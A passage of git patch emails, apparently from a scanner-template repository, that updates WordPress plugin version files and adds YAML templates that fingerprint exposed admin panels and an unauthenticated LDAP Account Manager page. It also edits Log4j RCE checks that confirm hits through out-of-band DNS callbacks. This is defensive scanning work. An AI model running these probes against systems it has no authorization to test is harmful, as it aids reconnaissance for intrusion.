Subject: [PATCH 0855/1133] Auto WordPress Plugins Update [Wed Jan 11 04:02:18 UTC 2023] :robot: --- .../plugins/facebook-for-woocommerce.txt | 2 +- .../plugins/google-listings-and-ads.txt | 2 +- .../plugins/insert-headers-and-footers.txt | 2 +- helpers/wordpress/plugins/jetpack.txt | 2 +- helpers/wordpress/plugins/litespeed-cache.txt | 2 +- helpers/wordpress/plugins/loginpress.txt | 2 +- helpers/wordpress/plugins/mailpoet.txt | 2 +- helpers/wordpress/plugins/ninja-forms.txt | 2 +- helpers/wordpress/plugins/ocean-extra.txt | 2 +- helpers/wordpress/plugins/post-smtp.txt | 2 +- .../plugins/simple-page-ordering.txt | 2 +- .../plugins/webp-converter-for-media.txt | 2 +- helpers/wordpress/plugins/webp-express.txt | 1 + helpers/wordpress/plugins/woocommerce.txt | 2 +- helpers/wordpress/plugins/wordpress-seo.txt | 2 +- helpers/wordpress/plugins/wp-google-maps.txt | 2 +- helpers/wordpress/plugins/wp-reset.txt | 2 +- helpers/wordpress/plugins/wp-statistics.txt | 2 +- .../wordpress/plugins/webp-express.yaml | 49 +++++++++++++++++++ 19 files changed, 67 insertions(+), 17 deletions(-) create mode 100644 helpers/wordpress/plugins/webp-express.txt create mode 100644 technologies/wordpress/plugins/webp-express.yaml diff --git a/helpers/wordpress/plugins/facebook-for-woocommerce.txt b/helpers/wordpress/plugins/facebook-for-woocommerce.txt index 3a8b97174c..e46454be8c 100644 --- a/helpers/wordpress/plugins/facebook-for-woocommerce.txt +++ b/helpers/wordpress/plugins/facebook-for-woocommerce.txt @@ -1 +1 @@ -3.0.7 \ No newline at end of file +3.0.8 \ No newline at end of file diff --git a/helpers/wordpress/plugins/google-listings-and-ads.txt b/helpers/wordpress/plugins/google-listings-and-ads.txt index 3b26524868..0501b79e98 100644 --- a/helpers/wordpress/plugins/google-listings-and-ads.txt +++ b/helpers/wordpress/plugins/google-listings-and-ads.txt @@ -1 +1 @@ -2.3.5 \ No newline at end of file +2.3.6 \ No newline at end of file diff --git a/helpers/wordpress/plugins/insert-headers-and-footers.txt b/helpers/wordpress/plugins/insert-headers-and-footers.txt index b9d2bdfd65..703cec9e23 100644 --- a/helpers/wordpress/plugins/insert-headers-and-footers.txt +++ b/helpers/wordpress/plugins/insert-headers-and-footers.txt @@ -1 +1 @@ -2.0.5 \ No newline at end of file +2.0.6 \ No newline at end of file diff --git a/helpers/wordpress/plugins/jetpack.txt b/helpers/wordpress/plugins/jetpack.txt index 37b64dadd4..ae27ab17be 100644 --- a/helpers/wordpress/plugins/jetpack.txt +++ b/helpers/wordpress/plugins/jetpack.txt @@ -1 +1 @@ -11.6 \ No newline at end of file +11.7 \ No newline at end of file diff --git a/helpers/wordpress/plugins/litespeed-cache.txt b/helpers/wordpress/plugins/litespeed-cache.txt index 7d3cdbf0dd..ba09cfd650 100644 --- a/helpers/wordpress/plugins/litespeed-cache.txt +++ b/helpers/wordpress/plugins/litespeed-cache.txt @@ -1 +1 @@ -5.3.1 \ No newline at end of file +5.3.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/loginpress.txt b/helpers/wordpress/plugins/loginpress.txt index f5d2a58582..9dbb0c0052 100644 --- a/helpers/wordpress/plugins/loginpress.txt +++ b/helpers/wordpress/plugins/loginpress.txt @@ -1 +1 @@ -1.6.3 \ No newline at end of file +1.7.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/mailpoet.txt b/helpers/wordpress/plugins/mailpoet.txt index ecedc98d1d..64b5ae3938 100644 --- a/helpers/wordpress/plugins/mailpoet.txt +++ b/helpers/wordpress/plugins/mailpoet.txt @@ -1 +1 @@ -4.3.1 \ No newline at end of file +4.4.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/ninja-forms.txt b/helpers/wordpress/plugins/ninja-forms.txt index 37a142c49b..86f7d611d6 100644 --- a/helpers/wordpress/plugins/ninja-forms.txt +++ b/helpers/wordpress/plugins/ninja-forms.txt @@ -1 +1 @@ -3.6.14 \ No newline at end of file +3.6.15 \ No newline at end of file diff --git a/helpers/wordpress/plugins/ocean-extra.txt b/helpers/wordpress/plugins/ocean-extra.txt index 703cec9e23..50aea0e7ab 100644 --- a/helpers/wordpress/plugins/ocean-extra.txt +++ b/helpers/wordpress/plugins/ocean-extra.txt @@ -1 +1 @@ -2.0.6 \ No newline at end of file +2.1.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/post-smtp.txt b/helpers/wordpress/plugins/post-smtp.txt index a6254504e4..e7034819f6 100644 --- a/helpers/wordpress/plugins/post-smtp.txt +++ b/helpers/wordpress/plugins/post-smtp.txt @@ -1 +1 @@ -2.3.1 \ No newline at end of file +2.3.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/simple-page-ordering.txt b/helpers/wordpress/plugins/simple-page-ordering.txt index 6550da6970..ab6d27898c 100644 --- a/helpers/wordpress/plugins/simple-page-ordering.txt +++ b/helpers/wordpress/plugins/simple-page-ordering.txt @@ -1 +1 @@ -2.4.3 \ No newline at end of file +2.4.4 \ No newline at end of file diff --git a/helpers/wordpress/plugins/webp-converter-for-media.txt b/helpers/wordpress/plugins/webp-converter-for-media.txt index 475e184294..25c1b355a1 100644 --- a/helpers/wordpress/plugins/webp-converter-for-media.txt +++ b/helpers/wordpress/plugins/webp-converter-for-media.txt @@ -1 +1 @@ -5.6.2 \ No newline at end of file +5.6.3 \ No newline at end of file diff --git a/helpers/wordpress/plugins/webp-express.txt b/helpers/wordpress/plugins/webp-express.txt new file mode 100644 index 0000000000..44c2012635 --- /dev/null +++ b/helpers/wordpress/plugins/webp-express.txt @@ -0,0 +1 @@ +N/A \ No newline at end of file diff --git a/helpers/wordpress/plugins/woocommerce.txt b/helpers/wordpress/plugins/woocommerce.txt index e1ce7b82a2..7796a13c20 100644 --- a/helpers/wordpress/plugins/woocommerce.txt +++ b/helpers/wordpress/plugins/woocommerce.txt @@ -1 +1 @@ -7.2.2 \ No newline at end of file +7.2.3 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wordpress-seo.txt b/helpers/wordpress/plugins/wordpress-seo.txt index a4bcb5031b..f55310d3db 100644 --- a/helpers/wordpress/plugins/wordpress-seo.txt +++ b/helpers/wordpress/plugins/wordpress-seo.txt @@ -1 +1 @@ -19.13 \ No newline at end of file +19.14 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-google-maps.txt b/helpers/wordpress/plugins/wp-google-maps.txt index 5623d118b3..6b5b662752 100644 --- a/helpers/wordpress/plugins/wp-google-maps.txt +++ b/helpers/wordpress/plugins/wp-google-maps.txt @@ -1 +1 @@ -9.0.14 \ No newline at end of file +9.0.15 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-reset.txt b/helpers/wordpress/plugins/wp-reset.txt index c3be2287dc..89130f4674 100644 --- a/helpers/wordpress/plugins/wp-reset.txt +++ b/helpers/wordpress/plugins/wp-reset.txt @@ -1 +1 @@ -1.96 \ No newline at end of file +1.97 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-statistics.txt b/helpers/wordpress/plugins/wp-statistics.txt index ff59c07b83..f7645df6c8 100644 --- a/helpers/wordpress/plugins/wp-statistics.txt +++ b/helpers/wordpress/plugins/wp-statistics.txt @@ -1 +1 @@ -13.2.13 \ No newline at end of file +13.2.14 \ No newline at end of file diff --git a/technologies/wordpress/plugins/webp-express.yaml b/technologies/wordpress/plugins/webp-express.yaml new file mode 100644 index 0000000000..be1033fc3c --- /dev/null +++ b/technologies/wordpress/plugins/webp-express.yaml @@ -0,0 +1,49 @@ +id: wordpress-webp-express + +info: + name: WebP Express Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/webp-express/ + metadata: + plugin_namespace: webp-express + wpscan: https://wpscan.com/plugin/webp-express + tags: tech,wordpress,wp-plugin,top-200 + +requests: + - method: GET + + path: + - "{{BaseURL}}/wp-content/plugins/webp-express/readme.txt" + + payloads: + last_version: helpers/wordpress/plugins/webp-express.txt + + extractors: + - type: regex + part: body + internal: true + name: internal_detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' From ceabdf756dd89ff489f95e833129035d71eb7e9d Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Wed, 11 Jan 2023 06:41:00 +0100 Subject: [PATCH 0856/1133] Add files via upload --- exposed-panels/sap-cloud-analytics.yaml | 26 +++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 exposed-panels/sap-cloud-analytics.yaml diff --git a/exposed-panels/sap-cloud-analytics.yaml b/exposed-panels/sap-cloud-analytics.yaml new file mode 100644 index 0000000000..d8ec831ca0 --- /dev/null +++ b/exposed-panels/sap-cloud-analytics.yaml @@ -0,0 +1,26 @@ +id: sap-cloud-analytics + +info: + name: SAP Analytics Cloud + author: righettod + severity: info + metadata: + verified: "true" + shodan-query: http.html:"SAP Analytics Cloud" + tags: panel,sap,cloudanalytics + +requests: + - method: GET + path: + - '{{BaseURL}}/' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'SAP Analytics Cloud' + + - type: status + status: + - 200 From d0f6af28ec1af770abe26efaee0093cb5ecbf097 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Wed, 11 Jan 2023 06:49:47 +0100 Subject: [PATCH 0857/1133] Update sap-cloud-analytics.yaml --- exposed-panels/sap-cloud-analytics.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/exposed-panels/sap-cloud-analytics.yaml b/exposed-panels/sap-cloud-analytics.yaml index d8ec831ca0..4c25956c01 100644 --- a/exposed-panels/sap-cloud-analytics.yaml +++ b/exposed-panels/sap-cloud-analytics.yaml @@ -20,6 +20,8 @@ requests: part: body words: - 'SAP Analytics Cloud' + - '/approuter/' + condition: and - type: status status: From 60ecd5c16785ff10cbedae52ad2b593c5f442bf0 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 11 Jan 2023 11:53:35 +0530 Subject: [PATCH 0858/1133] Update elasticsearch5-log4j-rce.yaml --- vulnerabilities/other/elasticsearch5-log4j-rce.yaml | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/vulnerabilities/other/elasticsearch5-log4j-rce.yaml b/vulnerabilities/other/elasticsearch5-log4j-rce.yaml index a071696eae..39e72db161 100644 --- a/vulnerabilities/other/elasticsearch5-log4j-rce.yaml +++ b/vulnerabilities/other/elasticsearch5-log4j-rce.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-77 metadata: verified: "true" + shodan-query: 'elastic indices' tags: jndi,log4j,rce,oast,elasticsearch,cve,cve2021,kev requests: @@ -29,6 +30,11 @@ requests: matchers-condition: and matchers: + - type: word + part: body + words: + - "org.elasticsearch.transport" + - type: word part: interactsh_protocol # Confirms the DNS Interaction words: From 8f99b72676135fdda608173b03e9046f7c02ebd9 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 11 Jan 2023 12:04:21 +0530 Subject: [PATCH 0859/1133] Update apache-solr-log4j-rce.yaml --- vulnerabilities/apache/apache-solr-log4j-rce.yaml | 13 +++++++++++-- 1 file changed, 11 insertions(+), 2 deletions(-) diff --git a/vulnerabilities/apache/apache-solr-log4j-rce.yaml b/vulnerabilities/apache/apache-solr-log4j-rce.yaml index 98bc72fa50..b461067606 100644 --- a/vulnerabilities/apache/apache-solr-log4j-rce.yaml +++ b/vulnerabilities/apache/apache-solr-log4j-rce.yaml @@ -29,6 +29,11 @@ requests: matchers-condition: and matchers: + - type: word + part: body + words: + - "String index out of range" + - type: word part: interactsh_protocol # Confirms the DNS Interaction words: @@ -37,13 +42,17 @@ requests: - type: regex part: interactsh_request regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable extractors: + - type: kval + kval: + - interactsh_ip # Print remote interaction IP in output + - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output # Enhanced by mp on 2022/05/27 From dbaed965bc99f266005c395e23483087cf83532c Mon Sep 17 00:00:00 2001 From: Arman <65326024+tess-ss@users.noreply.github.com> Date: Wed, 11 Jan 2023 17:51:57 -0500 Subject: [PATCH 0860/1133] Create ldap-account-manager.yaml --- misconfiguration/ldap-account-manager.yaml | 35 ++++++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 misconfiguration/ldap-account-manager.yaml diff --git a/misconfiguration/ldap-account-manager.yaml b/misconfiguration/ldap-account-manager.yaml new file mode 100644 index 0000000000..589d1b14e3 --- /dev/null +++ b/misconfiguration/ldap-account-manager.yaml @@ -0,0 +1,35 @@ +id: ldap-account-manager + +info: + name: LDAP Account Manager + author: tess + severity: medium + metadata: + verified: "true" + shodan-dork: http.title:"LDAP Account Manager" + tags: ldap,misconfig + +requests: + - method: GET + path: + - '{{BaseURL}}/templates/config/profmanage.php' + + matchers-condition: and + matchers: + + - type: word + words: + - 'LDAP Account Manager' + - 'Profile management' + - 'Add profile' + part: body + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 From 7b697e1eba2cadd4b15fdd07c0f545b67854518f Mon Sep 17 00:00:00 2001 From: Arman <65326024+tess-ss@users.noreply.github.com> Date: Wed, 11 Jan 2023 18:07:29 -0500 Subject: [PATCH 0861/1133] Create snapdrop-detect.yaml --- iot/snapdrop-detect.yaml | 34 ++++++++++++++++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 iot/snapdrop-detect.yaml diff --git a/iot/snapdrop-detect.yaml b/iot/snapdrop-detect.yaml new file mode 100644 index 0000000000..bfd0966c0e --- /dev/null +++ b/iot/snapdrop-detect.yaml @@ -0,0 +1,34 @@ +id: snapdrop-detect + +info: + name: Snapdrop Detect + author: tess + severity: info + metadata: + verified: "true" + shodan-dork: http.title:"Snapdrop" + tags: iot,detect + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + + - type: word + words: + - 'Snapdrop' + - 'Open Snapdrop on other devices to send files' + part: body + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 From f4f9aeb968435da102168db378b0b35cca92b5f7 Mon Sep 17 00:00:00 2001 From: Arman <65326024+tess-ss@users.noreply.github.com> Date: Wed, 11 Jan 2023 18:16:32 -0500 Subject: [PATCH 0862/1133] Create sap-successfactors-detect.yaml --- exposed-panels/sap-successfactors-detect.yaml | 34 +++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 exposed-panels/sap-successfactors-detect.yaml diff --git a/exposed-panels/sap-successfactors-detect.yaml b/exposed-panels/sap-successfactors-detect.yaml new file mode 100644 index 0000000000..019a8e2921 --- /dev/null +++ b/exposed-panels/sap-successfactors-detect.yaml @@ -0,0 +1,34 @@ +id: sap-successfactors-detect + +info: + name: SAP SuccessFactors Detect + author: tess + severity: info + metadata: + verified: "true" + shodan-dork: title:"Login - SAP SuccessFactors" + tags: sap,detect + +requests: + - method: GET + path: + - '{{BaseURL}}/sf/start' + + matchers-condition: and + matchers: + + - type: word + words: + - 'SAP SuccessFactors' + - 'ajaxSecKey=' + part: body + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 From 473e031cdfef33ec2372d45063cb12b4ec0cc694 Mon Sep 17 00:00:00 2001 From: Arman <65326024+tess-ss@users.noreply.github.com> Date: Wed, 11 Jan 2023 18:30:23 -0500 Subject: [PATCH 0863/1133] Update kafka-manager-panel.yaml --- exposed-panels/kafka-manager-panel.yaml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/exposed-panels/kafka-manager-panel.yaml b/exposed-panels/kafka-manager-panel.yaml index abb02f43cf..b5e405f008 100644 --- a/exposed-panels/kafka-manager-panel.yaml +++ b/exposed-panels/kafka-manager-panel.yaml @@ -15,6 +15,7 @@ requests: - method: GET path: - "{{BaseURL}}" + - "{{BaseURL}}/addCluster" matchers-condition: or matchers: @@ -22,6 +23,8 @@ requests: part: body words: - "Kafka Manager" + - "Add Cluster" + - "Cluster Name" - type: word part: header From 29499582bd865d2f9d164e7529046390dd5ff10b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 12 Jan 2023 04:02:04 +0000 Subject: [PATCH 0864/1133] Auto WordPress Plugins Update [Thu Jan 12 04:02:04 UTC 2023] :robot: --- helpers/wordpress/plugins/leadin.txt | 2 +- helpers/wordpress/plugins/nextgen-gallery.txt | 2 +- helpers/wordpress/plugins/ocean-extra.txt | 2 +- helpers/wordpress/plugins/photo-gallery.txt | 2 +- helpers/wordpress/plugins/pixelyoursite.txt | 2 +- helpers/wordpress/plugins/really-simple-ssl.txt | 2 +- helpers/wordpress/plugins/seo-by-rank-math.txt | 2 +- helpers/wordpress/plugins/translatepress-multilingual.txt | 2 +- helpers/wordpress/plugins/w3-total-cache.txt | 2 +- helpers/wordpress/plugins/woocommerce-gateway-stripe.txt | 2 +- helpers/wordpress/plugins/woocommerce-payments.txt | 2 +- helpers/wordpress/plugins/wp-fastest-cache.txt | 2 +- helpers/wordpress/plugins/wp-google-maps.txt | 2 +- helpers/wordpress/plugins/wp-user-avatar.txt | 2 +- helpers/wordpress/plugins/wpforms-lite.txt | 2 +- 15 files changed, 15 insertions(+), 15 deletions(-) diff --git a/helpers/wordpress/plugins/leadin.txt b/helpers/wordpress/plugins/leadin.txt index 334cc2afe3..36c41896d6 100644 --- a/helpers/wordpress/plugins/leadin.txt +++ b/helpers/wordpress/plugins/leadin.txt @@ -1 +1 @@ -9.2.81 \ No newline at end of file +10.0.10 \ No newline at end of file diff --git a/helpers/wordpress/plugins/nextgen-gallery.txt b/helpers/wordpress/plugins/nextgen-gallery.txt index 9ec58f6633..67f172f8ef 100644 --- a/helpers/wordpress/plugins/nextgen-gallery.txt +++ b/helpers/wordpress/plugins/nextgen-gallery.txt @@ -1 +1 @@ -3.30 \ No newline at end of file +3.32 \ No newline at end of file diff --git a/helpers/wordpress/plugins/ocean-extra.txt b/helpers/wordpress/plugins/ocean-extra.txt index 50aea0e7ab..7c32728738 100644 --- a/helpers/wordpress/plugins/ocean-extra.txt +++ b/helpers/wordpress/plugins/ocean-extra.txt @@ -1 +1 @@ -2.1.0 \ No newline at end of file +2.1.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/photo-gallery.txt b/helpers/wordpress/plugins/photo-gallery.txt index 5af131d650..709058798c 100644 --- a/helpers/wordpress/plugins/photo-gallery.txt +++ b/helpers/wordpress/plugins/photo-gallery.txt @@ -1 +1 @@ -1.8.9 \ No newline at end of file +1.8.10 \ No newline at end of file diff --git a/helpers/wordpress/plugins/pixelyoursite.txt b/helpers/wordpress/plugins/pixelyoursite.txt index 4f22ce3609..4d0ffae7b5 100644 --- a/helpers/wordpress/plugins/pixelyoursite.txt +++ b/helpers/wordpress/plugins/pixelyoursite.txt @@ -1 +1 @@ -9.2.2 \ No newline at end of file +9.3.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/really-simple-ssl.txt b/helpers/wordpress/plugins/really-simple-ssl.txt index 17e1a55c78..358e78e607 100644 --- a/helpers/wordpress/plugins/really-simple-ssl.txt +++ b/helpers/wordpress/plugins/really-simple-ssl.txt @@ -1 +1 @@ -6.0.14 \ No newline at end of file +6.1.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/seo-by-rank-math.txt b/helpers/wordpress/plugins/seo-by-rank-math.txt index f7528e3ff9..7dc1a911b4 100644 --- a/helpers/wordpress/plugins/seo-by-rank-math.txt +++ b/helpers/wordpress/plugins/seo-by-rank-math.txt @@ -1 +1 @@ -1.0.105 \ No newline at end of file +1.0.106 \ No newline at end of file diff --git a/helpers/wordpress/plugins/translatepress-multilingual.txt b/helpers/wordpress/plugins/translatepress-multilingual.txt index ab6d27898c..26f8b8bcdf 100644 --- a/helpers/wordpress/plugins/translatepress-multilingual.txt +++ b/helpers/wordpress/plugins/translatepress-multilingual.txt @@ -1 +1 @@ -2.4.4 \ No newline at end of file +2.4.5 \ No newline at end of file diff --git a/helpers/wordpress/plugins/w3-total-cache.txt b/helpers/wordpress/plugins/w3-total-cache.txt index 72d132f745..565a0d44fd 100644 --- a/helpers/wordpress/plugins/w3-total-cache.txt +++ b/helpers/wordpress/plugins/w3-total-cache.txt @@ -1 +1 @@ -2.2.9 \ No newline at end of file +2.2.10 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woocommerce-gateway-stripe.txt b/helpers/wordpress/plugins/woocommerce-gateway-stripe.txt index 73a86b1970..2f963cd6d1 100644 --- a/helpers/wordpress/plugins/woocommerce-gateway-stripe.txt +++ b/helpers/wordpress/plugins/woocommerce-gateway-stripe.txt @@ -1 +1 @@ -7.0.1 \ No newline at end of file +7.0.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woocommerce-payments.txt b/helpers/wordpress/plugins/woocommerce-payments.txt index 804440660c..e230c8396d 100644 --- a/helpers/wordpress/plugins/woocommerce-payments.txt +++ b/helpers/wordpress/plugins/woocommerce-payments.txt @@ -1 +1 @@ -5.2.1 \ No newline at end of file +5.3.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-fastest-cache.txt b/helpers/wordpress/plugins/wp-fastest-cache.txt index e5a4a5e7d8..1cc5f657e0 100644 --- a/helpers/wordpress/plugins/wp-fastest-cache.txt +++ b/helpers/wordpress/plugins/wp-fastest-cache.txt @@ -1 +1 @@ -1.0.9 \ No newline at end of file +1.1.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-google-maps.txt b/helpers/wordpress/plugins/wp-google-maps.txt index 6b5b662752..5eeb3f978c 100644 --- a/helpers/wordpress/plugins/wp-google-maps.txt +++ b/helpers/wordpress/plugins/wp-google-maps.txt @@ -1 +1 @@ -9.0.15 \ No newline at end of file +9.0.17 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-user-avatar.txt b/helpers/wordpress/plugins/wp-user-avatar.txt index ae6e65bd96..d01c9f6604 100644 --- a/helpers/wordpress/plugins/wp-user-avatar.txt +++ b/helpers/wordpress/plugins/wp-user-avatar.txt @@ -1 +1 @@ -4.5.3 \ No newline at end of file +4.5.4 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wpforms-lite.txt b/helpers/wordpress/plugins/wpforms-lite.txt index cb1ad9b47f..691cb900f3 100644 --- a/helpers/wordpress/plugins/wpforms-lite.txt +++ b/helpers/wordpress/plugins/wpforms-lite.txt @@ -1 +1 @@ -1.7.9 \ No newline at end of file +1.7.9.1 \ No newline at end of file From 390e63ad54a00d6c55c8175226ebe127d8a4d53e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 12 Jan 2023 10:47:59 +0530 Subject: [PATCH 0865/1133] minor-update --- ...count-manager.yaml => unauth-ldap-account-manager.yaml} | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) rename misconfiguration/{ldap-account-manager.yaml => unauth-ldap-account-manager.yaml} (88%) diff --git a/misconfiguration/ldap-account-manager.yaml b/misconfiguration/unauth-ldap-account-manager.yaml similarity index 88% rename from misconfiguration/ldap-account-manager.yaml rename to misconfiguration/unauth-ldap-account-manager.yaml index 589d1b14e3..1df20da84b 100644 --- a/misconfiguration/ldap-account-manager.yaml +++ b/misconfiguration/unauth-ldap-account-manager.yaml @@ -1,7 +1,7 @@ -id: ldap-account-manager +id: unauth-ldap-account-manager info: - name: LDAP Account Manager + name: Unauthenticated LDAP Account Manager author: tess severity: medium metadata: @@ -16,13 +16,12 @@ requests: matchers-condition: and matchers: - - type: word + part: body words: - 'LDAP Account Manager' - 'Profile management' - 'Add profile' - part: body condition: and - type: word From 48db30da00e61815709ba5b7c6b44b416b874368 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 12 Jan 2023 10:53:50 +0530 Subject: [PATCH 0866/1133] Create ldap-account-manager-panel.yaml --- .../ldap-account-manager-panel.yaml | 36 +++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 exposed-panels/ldap-account-manager-panel.yaml diff --git a/exposed-panels/ldap-account-manager-panel.yaml b/exposed-panels/ldap-account-manager-panel.yaml new file mode 100644 index 0000000000..c07837d57e --- /dev/null +++ b/exposed-panels/ldap-account-manager-panel.yaml @@ -0,0 +1,36 @@ +id: ldap-account-manager-panel + +info: + name: LDAP Account Manager Login Panel + author: DhiyaneshDk + severity: info + description: | + LDAP Account Manager login panel was detected. + reference: + - https://www.ldap-account-manager.org/lamcms/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 + metadata: + verified: true + shodan-query: title:"LDAP Account Manager" + tags: panel,ldap + +requests: + - method: GET + path: + - "{{BaseURL}}/templates/login.php" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "LDAP Account Manager" + - "LAM configuration" + condition: and + + - type: status + status: + - 200 From 1e8fc9a817bc569781bf668f34a59dd919061996 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 12 Jan 2023 10:56:52 +0530 Subject: [PATCH 0867/1133] misc-changes --- iot/snapdrop-detect.yaml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/iot/snapdrop-detect.yaml b/iot/snapdrop-detect.yaml index bfd0966c0e..8ceeb27449 100644 --- a/iot/snapdrop-detect.yaml +++ b/iot/snapdrop-detect.yaml @@ -7,7 +7,7 @@ info: metadata: verified: "true" shodan-dork: http.title:"Snapdrop" - tags: iot,detect + tags: iot,snapdrop requests: - method: GET @@ -16,12 +16,11 @@ requests: matchers-condition: and matchers: - - type: word + part: body words: - 'Snapdrop' - 'Open Snapdrop on other devices to send files' - part: body condition: and - type: word From 96ad78461134c1e79342d3f77a7e390c35c3f7d3 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 12 Jan 2023 13:52:27 +0530 Subject: [PATCH 0868/1133] Ntop Detect --- technologies/ntop-detect.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 technologies/ntop-detect.yaml diff --git a/technologies/ntop-detect.yaml b/technologies/ntop-detect.yaml new file mode 100644 index 0000000000..6838470682 --- /dev/null +++ b/technologies/ntop-detect.yaml @@ -0,0 +1,29 @@ +id: ntop-detection + +info: + name: Ntop Detect + author: pussycat0x + severity: info + description: | + ntop is computer software that probes a computer network to show network use in a way similar to what the program top does for processes. + metadata: + verified: true + shodan-query: http.title:"welcome to ntop" + tags: tech,ntop,panel + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Welcome to ntop' + - 'Documentation' + + - type: status + status: + - 200 \ No newline at end of file From a1d3dbf600a02bf4bb5c4098847a2c835806632e Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 12 Jan 2023 13:54:19 +0530 Subject: [PATCH 0869/1133] RunCloud Default Page --- technologies/default-runcloud-page.yaml | 28 +++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 technologies/default-runcloud-page.yaml diff --git a/technologies/default-runcloud-page.yaml b/technologies/default-runcloud-page.yaml new file mode 100644 index 0000000000..01da2562a3 --- /dev/null +++ b/technologies/default-runcloud-page.yaml @@ -0,0 +1,28 @@ +id: default-runcloud-page + +info: + name: RunCloud Default Page + author: pussycat0x + severity: info + metadata: + verified: true + shodan-query: http.title:"Welcome To RunCloud" + tags: tech,runcloud,default-page + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Welcome To RunCloud' + - 'Getting Started' + condition: and + + - type: status + status: + - 200 \ No newline at end of file From 18dc6057964b8011572727d9d111368921acd72a Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 12 Jan 2023 13:59:13 +0530 Subject: [PATCH 0870/1133] condition -update --- technologies/ntop-detect.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/technologies/ntop-detect.yaml b/technologies/ntop-detect.yaml index 6838470682..09ee295a3e 100644 --- a/technologies/ntop-detect.yaml +++ b/technologies/ntop-detect.yaml @@ -23,7 +23,8 @@ requests: words: - 'Welcome to ntop' - 'Documentation' + condition: and - type: status status: - - 200 \ No newline at end of file + - 200 From 546f1a59201d0e6e843618e7f31b2cfc1260da29 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 12 Jan 2023 14:02:00 +0530 Subject: [PATCH 0871/1133] Update ntop-detect.yaml --- technologies/ntop-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/technologies/ntop-detect.yaml b/technologies/ntop-detect.yaml index 09ee295a3e..9c67632c6d 100644 --- a/technologies/ntop-detect.yaml +++ b/technologies/ntop-detect.yaml @@ -23,7 +23,7 @@ requests: words: - 'Welcome to ntop' - 'Documentation' - condition: and + condition: and - type: status status: From e79b0a3e0a3bbac1a025086f7760bd5242118902 Mon Sep 17 00:00:00 2001 From: Rizwan Syed 